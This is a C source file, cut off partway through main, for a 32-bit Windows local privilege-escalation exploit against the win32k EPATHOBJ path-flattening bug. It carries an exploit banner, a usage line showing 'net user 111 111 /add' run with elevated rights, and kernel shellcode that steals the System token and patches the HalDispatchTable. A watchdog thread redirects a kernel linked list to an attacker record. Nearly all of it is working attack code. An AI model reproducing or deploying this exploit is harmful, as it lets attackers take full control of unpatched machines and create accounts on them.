#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
//#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
#pragma comment(linker, "/SECTION:.text,ERW")
//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
//
// Scratch path data for the GDI path calls; those calls are made after this
// chunk and are not visible here. Both arrays are sized by MAX_POLYPOINTS.
POINT Points[MAX_POLYPOINTS];
BYTE PointTypes[MAX_POLYPOINTS];
// Region handles released by WatchdogThread (DeleteObject in reverse order);
// NumRegion is the count of valid entries. Where they are created is outside
// this chunk. Note WatchdogThread's release loop leaves NumRegion wrapped to
// ULONG_MAX, so it is not a valid count afterwards.
HRGN Regions[MAX_REGIONS];
ULONG NumRegion = 0;
// Synchronization object WatchdogThread waits on with CYCLE_TIMEOUT; a timeout
// is taken to mean the main thread is stuck. Its owner is not visible here.
HANDLE Mutex;
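// Log levels, in increasing severity. The logging routines are declared here
// and defined outside this chunk; they are declared with (void) so the
// compiler checks call sites instead of accepting any argument list.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
// Prepare the logger; called once in main before the first LogMessage().
VOID LogInit(void);
// Tear the logger down. (Spelled "LogRelase" to match the existing callers.)
VOID LogRelase(void);
// printf-style logging at the given level. Format is passed through as a
// format string, so it must always be a trusted literal, never user input;
// every visible call site passes a literal. The BOOL result's meaning is
// decided by the definition, which is not visible here.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);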
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
#define PD_RESETSTYLE 0x00000004
#define PD_CLOSEFIGURE 0x00000008
#define PD_BEZIERS 0x00000010
#define ENABLE_SWITCH_DESKTOP 1
// Point in the kernel path record format. The DDK's winddi.h declares the
// fields as FIX (a 28.4 fixed-point LONG); ULONG here has the same size on
// 32-bit but differs in signedness, which does not matter for a raw copy.
typedef struct _POINTFIX
{
ULONG x;
ULONG y;
} POINTFIX, *PPOINTFIX;
// Approximated from reverse engineering.
// The author's reconstruction of a win32k path record: a doubly-linked node
// with a flags word (presumably the PD_* bits defined above) and a point
// count. Only four inline points are declared, enough for ExploitRecord
// below; the real record is presumably variable length, so sizeof(PATHRECORD)
// must not be taken as the kernel object's size.
typedef struct _PATHRECORD {
struct _PATHRECORD *next;
struct _PATHRECORD *prev;
ULONG flags;
ULONG count;
POINTFIX points[4];
} PATHRECORD, *PPATHRECORD;
// Record whose next pointer WatchdogThread swaps with InterlockedExchange. It
// is written from user mode, so it must point at user-writable memory; where
// it is assigned is outside this chunk.
PPATHRECORD PathRecord;
// Record the list is redirected to. Zero-initialized here; presumably filled
// in after this chunk (not visible).
PATHRECORD ExploitRecord = {0};
// Not referenced in the visible part of the file.
PPATHRECORD ExploitRecordExit;
// One loaded kernel module, in the layout returned by NtQuerySystemInformation
// for the SystemModuleInformation class (undocumented but stable on 32-bit NT).
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase; // load address of the module (kernel virtual address)
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName; // index into FullPathName where the base name starts
UCHAR FullPathName[ 256 ]; // NUL-terminated ANSI path
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
// Header of the SystemModuleInformation buffer: NumberOfModules entries follow,
// so Modules[1] is a variable-length tail, not a fixed single entry. main
// declares one of these on the stack (a single entry); the query that fills
// it is cut off at the end of this chunk, so how truncation is handled is not
// visible — presumably only the first entry (the kernel image) is needed.
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
// Native API entry points, resolved from ntdll with GetProcAddress in main.
// They are declared to return ULONG although the real return type is NTSTATUS
// (a signed LONG); main copes by storing the result in a LONG and testing
// `< 0`. NtAllocateVirtualMemory's 3rd and 4th parameters are ULONG_PTR and
// PSIZE_T in the real prototype, which only match ULONG/PULONG on 32-bit —
// the only target this program claims to support.
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
typedef ULONG ( __stdcall *NtFreeVirtualMemory_)( HANDLE, PVOID, PULONG, ULONG);
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
NtFreeVirtualMemory_ NtFreeVirtualMemory;
// Kernel addresses read by ShellCode. FixAddress is set by FindAFixAddress
// below; the other four are resolved outside this chunk (not visible).
ULONG PsInitialSystemProcess, PsReferencePrimaryToken,
PsGetThreadProcess, WriteToHalDispatchTable, FixAddress;
//
// Kernel-mode payload. _declspec(naked): the compiler emits no prologue or
// epilogue, so the routine saves the interrupted register/flag state itself
// (pushad/pushfd) and restores it (popfd/popad) before writing its results.
// The symbols it reads (PsReferencePrimaryToken, PsInitialSystemProcess,
// PsGetThreadProcess, WriteToHalDispatchTable, FixAddress) are the ULONG
// globals declared above. The ';' comments inside the block are the author's.
// From them and from the stores below: the routine copies one dword from the
// System process object into the current process object (the "token" the
// author refers to), restores the HalDispatchTable entry by writing a 0xC3
// byte at FixAddress and storing that address back through
// WriteToHalDispatchTable, and finally writes the values the
// NtQueryIntervalProfile caller will see through the third stack argument.
// The structure offsets involved are not recoverable from this file —
// confirm against the target build before trusting the details.
//
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
; scan forward from PsReferencePrimaryToken for the byte 8Dh; the dword that
; follows it is kept in edi and used as an offset below (author's approach to
; avoiding a hard-coded per-build offset — not verifiable from this file)
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
push esi
add edi, eax
movsd
;add token ref count.
pop esi
mov esi, [esi]
and esi, 0xFFFFFFF8
lea eax, [esi-0x18]
mov DWORD PTR [eax], 0x016B00B5
;fix the haltable
mov eax, WriteToHalDispatchTable
mov ecx, FixAddress
mov [ecx], 0xC3
mov DWORD PTR [eax], ecx
popfd
popad
;set ret code for NtQueryIntervalProfile
mov eax, [esp+0xc]
mov DWORD PTR [eax+4], 1
mov DWORD PTR [eax+8], 0xC0000018
xor eax, eax
ret
}
}
//
// Thread entry point. Waits on Mutex for CYCLE_TIMEOUT milliseconds; a timeout
// is taken to mean the main thread is stuck in FlattenPath(), and the list is
// then patched so the kernel follows the next pointer into ExploitRecord.
// Parameter is unused (thread-start signature). Always returns 0.
//
DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
//
// This routine waits for a mutex object to timeout, then patches the
// compromised linked list to point to an exploit. We need to do this
// because, per the comment below, the kernel is still walking the list and
// will follow whatever next pointer is installed.
//
LogMessage(L_INFO, "Watchdog thread %d waiting on Mutex", GetCurrentThreadId());
if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
//
// It looks like the main thread is stuck in a call to FlattenPath(),
// because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
// up, and then patch the list to trigger our exploit.
//
// Release the regions in reverse order. Post-decrement: when NumRegion is 0
// the test fails but the counter still wraps to ULONG_MAX, so NumRegion is
// not a valid count after this loop.
while (NumRegion--)
DeleteObject(Regions[NumRegion]);
// Logged at L_ERROR although it is informational. %08x with pointer
// arguments is 32-bit only, like the rest of the program. PathRecord must
// already point at the record to patch; it is assigned outside this chunk.
LogMessage(L_ERROR, "InterlockedExchange(0x%08x, 0x%08x);", &PathRecord->next, &ExploitRecord);
// Atomic store: the kernel is presumably reading this pointer concurrently,
// so it must never observe a half-written value.
InterlockedExchange((PLONG)&PathRecord->next, (LONG)&ExploitRecord);
} else {
LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
}
return 0;
}
void wellcome()
{
    // Startup banner, written to stdout exactly as the original printed it.
    static const char banner[] =
        "\t\tthe win32k.sys EPATHOBJ 0day exploit\n"
        "*******************************************************************\n"
        "***\texploit by:<progmboy> <programmeboy@gmail.com>\t\t***\n"
        "***\t0day finder:<Tavis Ormandy> <taviso@cmpxchg8b.com>\t***\n"
        "***\ttested system:xp/2003/win7/2008 (*32bit*)\t\t***\n"
        "*******************************************************************\n";
    fputs(banner, stdout);
}
void usage()
{
    // Command-line help, printed when main gets no arguments. The text is
    // kept verbatim, including the missing trailing newline.
    static const char help[] =
        "\nusage:\n<app> <cmd> <parameter>\n"
        "example:\napp.exe net \"user 111 111 /add\"";
    fputs(help, stdout);
}
BOOL
FindAFixAddress(
    ULONG NtoskrnlBase)
{
    // Despite the name nothing is searched: the patch site is a fixed offset
    // into the kernel image, the reserved e_res2 field of its DOS header,
    // which ShellCode later writes to. The result is published through the
    // FixAddress global and logged; the function always reports success.
    const ULONG patchSite = NtoskrnlBase + FIELD_OFFSET(IMAGE_DOS_HEADER, e_res2);
    FixAddress = patchSite;
    LogMessage(L_INFO, "Get FixAddress --> 0x%08x", FixAddress);
    return TRUE;
}
//
// The original author's notes on the constants: 0x602464FF /*jmp esp+0x60*/
// and 0x51C3686A /*push 0; ret*/. Only the first appears below; the second is
// not used by this function.
//
DWORD CheckMagicDword()
{
    // Per-OS-version magic value. main masks it to a page boundary and uses
    // that as the address to allocate, and treats 0 as "unsupported".
    OSVERSIONINFOEX osInfo = {0};
    osInfo.dwOSVersionInfoSize = sizeof osInfo;

    // A failed GetVersionEx is reported the same way as an unknown version.
    if (!GetVersionEx((OSVERSIONINFO *)&osInfo)) {
        return 0;
    }

    // Only the major version is consulted (5 = 2000/XP/2003, 6 = Vista/7/
    // 2008/8); the minor version and service pack are not distinguished.
    if (osInfo.dwMajorVersion == 5) {
        return 0x602464FF;
    }
    if (osInfo.dwMajorVersion == 6) {
        return 0x642464FF;
    }
    return 0;
}
int main(int argc, char **argv)
{
HANDLE Thread;
HDC Device;
ULONG Size;
ULONG PointNum;
int nret = 0;
DWORD MAGIC_DWORD = CheckMagicDword();
ULONG AllocSize = 0x1000, status, NtoskrnlBase;
RTL_PROCESS_MODULES module;
HMODULE ntoskrnl = NULL;
DWORD dwFix;
ULONG Address = MAGIC_DWORD & 0xFFFFF000;
LONG ret;
BOOL bRet = FALSE;
#ifdef ENABLE_SWITCH_DESKTOP
HDESK hDesk;
#endif
HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
wellcome();
if (argc < 2){
usage();
return -1;
}
if (!MAGIC_DWORD){
LogMessage(L_ERROR, "unsupported system version\n");
return -1;
}
LogInit();
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation = (NtQuerySystemInformation_)GetProcAddress( ntdll ,"NtQuerySystemInformation" );
NtFreeVirtualMemory = (NtFreeVirtualMemory_)GetProcAddress( ntdll ,"NtFreeVirtualMemory" );
if ( !NtQueryIntervalProfile || !NtAllocateVirtualMemory ||
!NtQuerySystemInformation || !NtFreeVirtualMemory){
LogMessage(L_ERROR, "get function address error\n");
LogRelase();
return -1;
}
//
// try to allocate memory.
//
while (TRUE){
ret = NtAllocateVirtualMemory( (HANDLE)-1, &Address, 0, &AllocSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if(ret < 0){
MEMORY_BASIC_INFORMATION meminfo;
LogMessage(L_ERROR, "allocate memory error code 0x%08x", ret);
LogMessage(L_INFO, "try to free memory");
if(VirtualQuery((LPVOID)Address, &meminfo, sizeof(meminfo))){
LogMessage(L_INFO, "meminfo state %d %d\n", meminfo.State, meminfo.Protect);
}
ret = NtFreeVirtualMemory((HANDLE)-1, &Address, &AllocSize, MEM_RELEASE);
if (ret < 0){
LogMessage(L_ERROR, "free memory error code 0x%08x", ret);
LogRelase();
return -1;
}
}else{
break;
}
}
//
// get the kernel info
//
status = NtQuerySystemIn